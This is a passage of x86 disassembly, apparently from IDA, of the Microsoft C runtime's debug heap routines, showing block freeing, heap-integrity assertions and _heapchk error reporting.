jz short loc_41C8AA
push offset a_pfirstblockPo ; "_pFirstBlock == pOldBlock"
push 0
push 2CFh
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41C8AA
int 3 ; Trap to Debugger
loc_41C8AA: ; CODE XREF: sub_41C3F0+497�j
; sub_41C3F0+4B7�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41C87F
mov edx, [ebp+var_C]
mov eax, [edx]
mov ds:dword_4F32E8, eax
loc_41C8BA: ; CODE XREF: sub_41C3F0+48D�j
cmp ds:dword_4F32E8, 0
jz short loc_41C8D1
mov ecx, ds:dword_4F32E8
mov edx, [ebp+var_C]
mov [ecx+4], edx
jmp short loc_41C8D9
; ---------------------------------------------------------------------------
loc_41C8D1: ; CODE XREF: sub_41C3F0+4D1�j
mov eax, [ebp+var_C]
mov ds:dword_4F32E0, eax
loc_41C8D9: ; CODE XREF: sub_41C3F0+4DF�j
mov ecx, [ebp+var_C]
mov edx, ds:dword_4F32E8
mov [ecx], edx
mov eax, [ebp+var_C]
mov dword ptr [eax+4], 0
mov ecx, [ebp+var_C]
mov ds:dword_4F32E8, ecx
mov eax, [ebp+var_4]
loc_41C8FA: ; CODE XREF: sub_41C3F0+2E�j
; sub_41C3F0+51�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41C3F0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
push 0
push 0
push 1
mov eax, [ebp+0Ch]
push eax
mov ecx, [ebp+8]
push ecx
call sub_41C940
add esp, 14h
mov [ebp-4], eax
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C940 proc near ; CODE XREF: _0:0041C922�p
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
; FUNCTION CHUNK AT 0041C9AE SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43C7E0
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
push 9
call sub_423280
add esp, 4
mov [ebp+var_4], 0
push 0
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_41C3F0
add esp, 18h
mov [ebp+var_1C], eax
mov [ebp+var_4], 0FFFFFFFFh
call sub_41C9A3
jmp short loc_41C9AE
sub_41C940 endp
; =============== S U B R O U T I N E =======================================
sub_41C9A3 proc near ; CODE XREF: sub_41C940+5C�p
; DATA XREF: _1:0043C7E8�o
push 9
call sub_423320
add esp, 4
retn
sub_41C9A3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41C940
loc_41C9AE: ; CODE XREF: sub_41C940+61�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_41C940
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C9D0 proc near ; CODE XREF: sub_4010AA+5C�p
; sub_40ADC9+B7�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 1
mov eax, [ebp+arg_0]
push eax
call sub_41CA10
add esp, 8
pop ebp
retn
sub_41C9D0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 1
mov eax, [ebp+8]
push eax
call sub_41CA80
add esp, 8
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CA10 proc near ; CODE XREF: sub_41BD80+98�p
; sub_41C3F0+47�p ...
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0041CA6D SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43C7F0
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 8
push ebx
push esi
push edi
push 9
call sub_423280
add esp, 4
mov [ebp+var_4], 0
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_41CA80
add esp, 8
mov [ebp+var_4], 0FFFFFFFFh
call sub_41CA62
jmp short loc_41CA6D
sub_41CA10 endp
; =============== S U B R O U T I N E =======================================
sub_41CA62 proc near ; CODE XREF: sub_41CA10+4B�p
; DATA XREF: _1:0043C7F8�o
push 9
call sub_423320
add esp, 4
retn
sub_41CA62 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41CA10
loc_41CA6D: ; CODE XREF: sub_41CA10+50�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_41CA10
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CA80 proc near ; CODE XREF: _0:0041C9F9�p
; sub_41CA10+3C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, ds:dword_4517E0
and eax, 4
test eax, eax
jz short loc_41CAC3
loc_41CA93: ; CODE XREF: sub_41CA80+41�j
call sub_41D1D0
test eax, eax
jnz short loc_41CABD
push offset a_crtcheckmemor ; "_CrtCheckMemory()"
push 0
push 402h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41CABD
int 3 ; Trap to Debugger
loc_41CABD: ; CODE XREF: sub_41CA80+1A�j
; sub_41CA80+3A�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41CA93
loc_41CAC3: ; CODE XREF: sub_41CA80+11�j
cmp [ebp+arg_0], 0
jnz short loc_41CACE
jmp loc_41CE65
; ---------------------------------------------------------------------------
loc_41CACE: ; CODE XREF: sub_41CA80+47�j
push 0
push 0
push 0
mov edx, [ebp+arg_4]
push edx
push 0
mov eax, [ebp+arg_0]
push eax
push 3
call ds:off_451BB0
add esp, 1Ch
test eax, eax
jnz short loc_41CB18
loc_41CAED: ; CODE XREF: sub_41CA80+91�j
push offset aClientHookFree ; "Client hook free failure.\n"
push offset aS_19 ; "%s"
push 0
push 0
push 0
push 0
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41CB0D
int 3 ; Trap to Debugger
loc_41CB0D: ; CODE XREF: sub_41CA80+8A�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41CAED
jmp loc_41CE65
; ---------------------------------------------------------------------------
loc_41CB18: ; CODE XREF: sub_41CA80+6B�j
; sub_41CA80+CD�j
mov edx, [ebp+arg_0]
push edx
call sub_41D6B0
add esp, 4
test eax, eax
jnz short loc_41CB49
push offset a_crtisvalidhea ; "_CrtIsValidHeapPointer(pUserData)"
push 0
push 414h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41CB49
int 3 ; Trap to Debugger
loc_41CB49: ; CODE XREF: sub_41CA80+A6�j
; sub_41CA80+C6�j
xor eax, eax
test eax, eax
jnz short loc_41CB18
mov ecx, [ebp+arg_0]
sub ecx, 20h
mov [ebp+var_4], ecx
loc_41CB58: ; CODE XREF: sub_41CA80+12F�j
mov edx, [ebp+var_4]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 4
jz short loc_41CBAB
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+14h], 1
jz short loc_41CBAB
mov edx, [ebp+var_4]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 2
jz short loc_41CBAB
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+14h], 3
jz short loc_41CBAB
push offset a_block_type_is ; "_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)"
push 0
push 41Ah
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41CBAB
int 3 ; Trap to Debugger
loc_41CBAB: ; CODE XREF: sub_41CA80+E6�j
; sub_41CA80+EF�j ...
xor edx, edx
test edx, edx
jnz short loc_41CB58
mov eax, ds:dword_4517E0
and eax, 4
test eax, eax
jnz loc_41CC86
push 4
mov cl, ds:byte_4517EC
push ecx
mov edx, [ebp+var_4]
add edx, 1Ch
push edx
call sub_41D140
add esp, 0Ch
test eax, eax
jnz short loc_41CC20
loc_41CBDD: ; CODE XREF: sub_41CA80+19E�j
mov eax, [ebp+var_4]
add eax, 20h
push eax
mov ecx, [ebp+var_4]
mov edx, [ecx+18h]
push edx
mov eax, [ebp+var_4]
mov ecx, [eax+14h]
and ecx, 0FFFFh
mov edx, ds:off_4517F0[ecx*4]
push edx
push offset aDamageBeforeHs ; "DAMAGE: before %hs block (#%d) at 0x%08"...
push 0
push 0
push 0
push 1
call sub_422610
add esp, 20h
cmp eax, 1
jnz short loc_41CC1A
int 3 ; Trap to Debugger
loc_41CC1A: ; CODE XREF: sub_41CA80+197�j
xor eax, eax
test eax, eax
jnz short loc_41CBDD
loc_41CC20: ; CODE XREF: sub_41CA80+15B�j
push 4
mov cl, ds:byte_4517EC
push ecx
mov edx, [ebp+var_4]
mov eax, [edx+10h]
mov ecx, [ebp+var_4]
lea edx, [ecx+eax+20h]
push edx
call sub_41D140
add esp, 0Ch
test eax, eax
jnz short loc_41CC86
loc_41CC43: ; CODE XREF: sub_41CA80+204�j
mov eax, [ebp+var_4]
add eax, 20h
push eax
mov ecx, [ebp+var_4]
mov edx, [ecx+18h]
push edx
mov eax, [ebp+var_4]
mov ecx, [eax+14h]
and ecx, 0FFFFh
mov edx, ds:off_4517F0[ecx*4]
push edx
push offset aDamageAfterHsB ; "DAMAGE: after %hs block (#%d) at 0x%08X"...
push 0
push 0
push 0
push 1
call sub_422610
add esp, 20h
cmp eax, 1
jnz short loc_41CC80
int 3 ; Trap to Debugger
loc_41CC80: ; CODE XREF: sub_41CA80+1FD�j
xor eax, eax
test eax, eax
jnz short loc_41CC43
loc_41CC86: ; CODE XREF: sub_41CA80+13B�j
; sub_41CA80+1C1�j
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+14h], 3
jnz short loc_41CCFB
loc_41CC8F: ; CODE XREF: sub_41CA80+249�j
mov edx, [ebp+var_4]
cmp dword ptr [edx+0Ch], 0FEDCBABCh
jnz short loc_41CCA4
mov eax, [ebp+var_4]
cmp dword ptr [eax+18h], 0
jz short loc_41CCC5
loc_41CCA4: ; CODE XREF: sub_41CA80+219�j
push offset aPheadNlineIgno ; "pHead->nLine == IGNORE_LINE && pHead->l"...
push 0
push 42Fh
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41CCC5
int 3 ; Trap to Debugger
loc_41CCC5: ; CODE XREF: sub_41CA80+222�j
; sub_41CA80+242�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41CC8F
mov edx, [ebp+var_4]
mov eax, [edx+10h]
add eax, 24h
push eax
xor ecx, ecx
mov cl, ds:byte_4517ED
push ecx
mov edx, [ebp+var_4]
push edx
call sub_41E4B0
add esp, 0Ch
mov eax, [ebp+var_4]
push eax
call sub_423CD0
add esp, 4
jmp loc_41CE65
; ---------------------------------------------------------------------------
loc_41CCFB: ; CODE XREF: sub_41CA80+20D�j
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+14h], 2
jnz short loc_41CD11
cmp [ebp+arg_4], 1
jnz short loc_41CD11
mov [ebp+arg_4], 2
loc_41CD11: ; CODE XREF: sub_41CA80+282�j
; sub_41CA80+288�j ...
mov edx, [ebp+var_4]
mov eax, [edx+14h]
cmp eax, [ebp+arg_4]
jz short loc_41CD3D
push offset aPheadNblockuse ; "pHead->nBlockUse == nBlockUse"
push 0
push 43Ch
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41CD3D
int 3 ; Trap to Debugger
loc_41CD3D: ; CODE XREF: sub_41CA80+29A�j
; sub_41CA80+2BA�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41CD11
mov edx, [ebp+var_4]
mov eax, ds:dword_4F32EC
sub eax, [edx+10h]
mov ds:dword_4F32EC, eax
mov ecx, ds:dword_4517E0
and ecx, 2
test ecx, ecx
jnz loc_41CE3C
mov edx, [ebp+var_4]
cmp dword ptr [edx], 0
jz short loc_41CD7C
mov eax, [ebp+var_4]
mov ecx, [eax]
mov edx, [ebp+var_4]
mov eax, [edx+4]
mov [ecx+4], eax
jmp short loc_41CDBA
; ---------------------------------------------------------------------------
loc_41CD7C: ; CODE XREF: sub_41CA80+2EA�j
; sub_41CA80+32C�j
mov ecx, ds:dword_4F32E0
cmp ecx, [ebp+var_4]
jz short loc_41CDA8
push offset a_plastblockPhe ; "_pLastBlock == pHead"
push 0
push 44Bh
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41CDA8
int 3 ; Trap to Debugger
loc_41CDA8: ; CODE XREF: sub_41CA80+305�j
; sub_41CA80+325�j
xor edx, edx
test edx, edx
jnz short loc_41CD7C
mov eax, [ebp+var_4]
mov ecx, [eax+4]
mov ds:dword_4F32E0, ecx
loc_41CDBA: ; CODE XREF: sub_41CA80+2FA�j
mov edx, [ebp+var_4]
cmp dword ptr [edx+4], 0
jz short loc_41CDD2
mov eax, [ebp+var_4]
mov ecx, [eax+4]
mov edx, [ebp+var_4]
mov eax, [edx]
mov [ecx], eax
jmp short loc_41CE0F
; ---------------------------------------------------------------------------
loc_41CDD2: ; CODE XREF: sub_41CA80+341�j
; sub_41CA80+382�j
mov ecx, ds:dword_4F32E8
cmp ecx, [ebp+var_4]
jz short loc_41CDFE
push offset a_pfirstblockPh ; "_pFirstBlock == pHead"
push 0
push 455h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41CDFE
int 3 ; Trap to Debugger
loc_41CDFE: ; CODE XREF: sub_41CA80+35B�j
; sub_41CA80+37B�j
xor edx, edx
test edx, edx
jnz short loc_41CDD2
mov eax, [ebp+var_4]
mov ecx, [eax]
mov ds:dword_4F32E8, ecx
loc_41CE0F: ; CODE XREF: sub_41CA80+350�j
mov edx, [ebp+var_4]
mov eax, [edx+10h]
add eax, 24h
push eax
xor ecx, ecx
mov cl, ds:byte_4517ED
push ecx
mov edx, [ebp+var_4]
push edx
call sub_41E4B0
add esp, 0Ch
mov eax, [ebp+var_4]
push eax
call sub_423CD0
add esp, 4
jmp short loc_41CE65
; ---------------------------------------------------------------------------
loc_41CE3C: ; CODE XREF: sub_41CA80+2DE�j
mov ecx, [ebp+var_4]
mov dword ptr [ecx+14h], 0
mov edx, [ebp+var_4]
mov eax, [edx+10h]
push eax
xor ecx, ecx
mov cl, ds:byte_4517ED
push ecx
mov edx, [ebp+var_4]
add edx, 20h
push edx
call sub_41E4B0
add esp, 0Ch
loc_41CE65: ; CODE XREF: sub_41CA80+49�j
; sub_41CA80+93�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41CA80 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 1
mov eax, [ebp+8]
push eax
call sub_41CE90
add esp, 8
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CE90 proc near ; CODE XREF: _0:0041CE79�p
; sub_420C50+11�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0041D00C SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43C928
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF0h
push ebx
push esi
push edi
mov eax, ds:dword_4517E0
and eax, 4
test eax, eax
jz short loc_41CEEF
loc_41CEBF: ; CODE XREF: sub_41CE90+5D�j
call sub_41D1D0
test eax, eax
jnz short loc_41CEE9
push offset a_crtcheckmemor ; "_CrtCheckMemory()"
push 0
push 49Dh
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41CEE9
int 3 ; Trap to Debugger
loc_41CEE9: ; CODE XREF: sub_41CE90+36�j
; sub_41CE90+56�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41CEBF
loc_41CEEF: ; CODE XREF: sub_41CE90+2D�j
push 9
call sub_423280
add esp, 4
mov [ebp+var_4], 0
loc_41CF00: ; CODE XREF: sub_41CE90+A5�j
mov edx, [ebp+arg_0]
push edx
call sub_41D6B0
add esp, 4
test eax, eax
jnz short loc_41CF31
push offset a_crtisvalidhea ; "_CrtIsValidHeapPointer(pUserData)"
push 0
push 4A9h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41CF31
int 3 ; Trap to Debugger
loc_41CF31: ; CODE XREF: sub_41CE90+7E�j
; sub_41CE90+9E�j
xor eax, eax
test eax, eax
jnz short loc_41CF00
mov ecx, [ebp+arg_0]
sub ecx, 20h
mov [ebp+var_20], ecx
loc_41CF40: ; CODE XREF: sub_41CE90+107�j
mov edx, [ebp+var_20]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 4
jz short loc_41CF93
mov ecx, [ebp+var_20]
cmp dword ptr [ecx+14h], 1
jz short loc_41CF93
mov edx, [ebp+var_20]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 2
jz short loc_41CF93
mov ecx, [ebp+var_20]
cmp dword ptr [ecx+14h], 3
jz short loc_41CF93
push offset a_block_type_is ; "_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)"
push 0
push 4AFh
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41CF93
int 3 ; Trap to Debugger
loc_41CF93: ; CODE XREF: sub_41CE90+BE�j
; sub_41CE90+C7�j ...
xor edx, edx
test edx, edx
jnz short loc_41CF40
mov eax, [ebp+var_20]
cmp dword ptr [eax+14h], 2
jnz short loc_41CFAF
cmp [ebp+arg_4], 1
jnz short loc_41CFAF
mov [ebp+arg_4], 2
loc_41CFAF: ; CODE XREF: sub_41CE90+110�j
; sub_41CE90+116�j
mov ecx, [ebp+var_20]
cmp dword ptr [ecx+14h], 3
jz short loc_41CFEA
loc_41CFB8: ; CODE XREF: sub_41CE90+158�j
mov edx, [ebp+var_20]
mov eax, [edx+14h]
cmp eax, [ebp+arg_4]
jz short loc_41CFE4
push offset aPheadNblockuse ; "pHead->nBlockUse == nBlockUse"
push 0
push 4B6h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41CFE4
int 3 ; Trap to Debugger
loc_41CFE4: ; CODE XREF: sub_41CE90+131�j
; sub_41CE90+151�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41CFB8
loc_41CFEA: ; CODE XREF: sub_41CE90+126�j
mov edx, [ebp+var_20]
mov eax, [edx+10h]
mov [ebp+var_1C], eax
mov [ebp+var_4], 0FFFFFFFFh
call sub_41D001
jmp short loc_41D00C
sub_41CE90 endp
; =============== S U B R O U T I N E =======================================
sub_41D001 proc near ; CODE XREF: sub_41CE90+16A�p
; DATA XREF: _1:0043C930�o
push 9
call sub_423320
add esp, 4
retn
sub_41D001 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41CE90
loc_41D00C: ; CODE XREF: sub_41CE90+16F�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_41CE90
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov eax, ds:dword_4517E8
mov [ebp-4], eax
mov ecx, [ebp+8]
mov ds:dword_4517E8, ecx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43C938
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
push 9
call sub_423280
add esp, 4
mov dword ptr [ebp-4], 0
mov eax, [ebp+8]
push eax
call sub_41D6B0
add esp, 4
test eax, eax
jz short loc_41D0EF
mov ecx, [ebp+8]
sub ecx, 20h
mov [ebp-1Ch], ecx
loc_41D08D: ; CODE XREF: _0:0041D0E4�j
mov edx, [ebp-1Ch]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 4
jz short loc_41D0E0
mov ecx, [ebp-1Ch]
cmp dword ptr [ecx+14h], 1
jz short loc_41D0E0
mov edx, [ebp-1Ch]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 2
jz short loc_41D0E0
mov ecx, [ebp-1Ch]
cmp dword ptr [ecx+14h], 3
jz short loc_41D0E0
push offset a_block_type_is ; "_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)"
push 0
push 4FFh
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41D0E0
int 3 ; Trap to Debugger
loc_41D0E0: ; CODE XREF: _0:0041D09B�j _0:0041D0A4�j ...
xor edx, edx
test edx, edx
jnz short loc_41D08D
mov eax, [ebp-1Ch]
mov ecx, [ebp+0Ch]
mov [eax+14h], ecx
loc_41D0EF: ; CODE XREF: _0:0041D082�j
mov dword ptr [ebp-4], 0FFFFFFFFh
call sub_41D0FD
jmp short loc_41D108
; =============== S U B R O U T I N E =======================================
sub_41D0FD proc near ; CODE XREF: _0:0041D0F6�p
; DATA XREF: _1:0043C940�o
push 9
call sub_423320
add esp, 4
retn
sub_41D0FD endp
; ---------------------------------------------------------------------------
loc_41D108: ; CODE XREF: _0:0041D0FB�j
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, ds:off_451BB0
mov [ebp-4], eax
mov ecx, [ebp+8]
mov ds:off_451BB0, ecx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D140 proc near ; CODE XREF: sub_41CA80+151�p
; sub_41CA80+1B7�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov [ebp+var_4], 1
loc_41D14E: ; CODE XREF: sub_41D140:loc_41D1BC�j
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_8]
sub ecx, 1
mov [ebp+arg_8], ecx
test eax, eax
jz short loc_41D1BE
mov edx, [ebp+arg_0]
xor eax, eax
mov al, [edx]
mov ecx, [ebp+arg_4]
and ecx, 0FFh
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
cmp eax, ecx
jz short loc_41D1BC
loc_41D17B: ; CODE XREF: sub_41D140+73�j
mov eax, [ebp+arg_4]
and eax, 0FFh
push eax
mov ecx, [ebp+arg_0]
xor edx, edx
mov dl, [ecx-1]
push edx
mov eax, [ebp+arg_0]
sub eax, 1
push eax
push offset aMemoryCheckErr ; "memory check error at 0x%08X = 0x%02X, "...
push 0
push 0
push 0
push 0
call sub_422610
add esp, 20h
cmp eax, 1
jnz short loc_41D1AF
int 3 ; Trap to Debugger
loc_41D1AF: ; CODE XREF: sub_41D140+6C�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41D17B
mov [ebp+var_4], 0
loc_41D1BC: ; CODE XREF: sub_41D140+39�j
jmp short loc_41D14E
; ---------------------------------------------------------------------------
loc_41D1BE: ; CODE XREF: sub_41D140+1C�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41D140 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D1D0 proc near ; CODE XREF: sub_41BF80:loc_41BF9C�p
; sub_41C3F0:loc_41C452�p ...
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0041D550 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43CAC0
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
mov eax, ds:dword_4517E0
and eax, 1
test eax, eax
jnz short loc_41D209
mov eax, 1
jmp loc_41D553
; ---------------------------------------------------------------------------
loc_41D209: ; CODE XREF: sub_41D1D0+2D�j
push 9
call sub_423280
add esp, 4
mov [ebp+var_4], 0
call sub_423E20
mov [ebp+var_24], eax
cmp [ebp+var_24], 0FFFFFFFFh
jz loc_41D32E
cmp [ebp+var_24], 0FFFFFFFEh
jz loc_41D32E
mov ecx, [ebp+var_24]
mov [ebp+var_30], ecx
mov edx, [ebp+var_30]
add edx, 6
mov [ebp+var_30], edx
cmp [ebp+var_30], 3
ja loc_41D2FC
mov eax, [ebp+var_30]
jmp off_41D564[eax*4]
loc_41D259: ; CODE XREF: sub_41D1D0+AD�j
; DATA XREF: _0:0041D570�o
push offset a_heapchkFailsW ; "_heapchk fails with _HEAPBADBEGIN.\n"
push offset aS_19 ; "%s"
push 0
push 0
push 0
push 0
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41D279
int 3 ; Trap to Debugger
loc_41D279: ; CODE XREF: sub_41D1D0+A6�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41D259
jmp loc_41D322
; ---------------------------------------------------------------------------
loc_41D284: ; CODE XREF: sub_41D1D0+82�j
; sub_41D1D0+D8�j
; DATA XREF: ...
push offset a_heapchkFail_0 ; "_heapchk fails with _HEAPBADNODE.\n"
push offset aS_19 ; "%s"
push 0
push 0
push 0
push 0
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41D2A4
int 3 ; Trap to Debugger
loc_41D2A4: ; CODE XREF: sub_41D1D0+D1�j
xor edx, edx
test edx, edx
jnz short loc_41D284
jmp short loc_41D322
; ---------------------------------------------------------------------------
loc_41D2AC: ; CODE XREF: sub_41D1D0+82�j
; sub_41D1D0+100�j
; DATA XREF: ...
push offset a_heapchkFail_1 ; "_heapchk fails with _HEAPBADEND.\n"
push offset aS_19 ; "%s"
push 0
push 0
push 0
push 0
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41D2CC
int 3 ; Trap to Debugger
loc_41D2CC: ; CODE XREF: sub_41D1D0+F9�j
xor eax, eax
test eax, eax
jnz short loc_41D2AC
jmp short loc_41D322
; ---------------------------------------------------------------------------
loc_41D2D4: ; CODE XREF: sub_41D1D0+82�j
; sub_41D1D0+128�j
; DATA XREF: ...
push offset a_heapchkFail_2 ; "_heapchk fails with _HEAPBADPTR.\n"
push offset aS_19 ; "%s"
push 0
push 0
push 0
push 0
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41D2F4
int 3 ; Trap to Debugger
loc_41D2F4: ; CODE XREF: sub_41D1D0+121�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41D2D4
jmp short loc_41D322
; ---------------------------------------------------------------------------
loc_41D2FC: ; CODE XREF: sub_41D1D0+79�j
; sub_41D1D0+150�j
push offset a_heapchkFail_3 ; "_heapchk fails with unknown return valu"...
push offset aS_19 ; "%s"
push 0
push 0
push 0
push 0
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41D31C
int 3 ; Trap to Debugger
loc_41D31C: ; CODE XREF: sub_41D1D0+149�j
xor edx, edx
test edx, edx
jnz short loc_41D2FC
loc_41D322: ; CODE XREF: sub_41D1D0+AF�j
; sub_41D1D0+DA�j ...
mov [ebp+var_1C], 0
jmp loc_41D537
; ---------------------------------------------------------------------------
loc_41D32E: ; CODE XREF: sub_41D1D0+56�j
; sub_41D1D0+60�j
mov [ebp+var_1C], 1
mov eax, ds:dword_4F32E8
mov [ebp+var_20], eax
jmp short loc_41D347
; ---------------------------------------------------------------------------
loc_41D33F: ; CODE XREF: sub_41D1D0:loc_41D532�j
mov ecx, [ebp+var_20]
mov edx, [ecx]
mov [ebp+var_20], edx
loc_41D347: ; CODE XREF: sub_41D1D0+16D�j
cmp [ebp+var_20], 0
jz loc_41D537
mov [ebp+var_28], 1
mov eax, [ebp+var_20]
mov ecx, [eax+14h]
and ecx, 0FFFFh
cmp ecx, 4
jz short loc_41D38C
mov edx, [ebp+var_20]
cmp dword ptr [edx+14h], 1
jz short loc_41D38C
mov eax, [ebp+var_20]
mov ecx, [eax+14h]
and ecx, 0FFFFh
cmp ecx, 2
jz short loc_41D38C
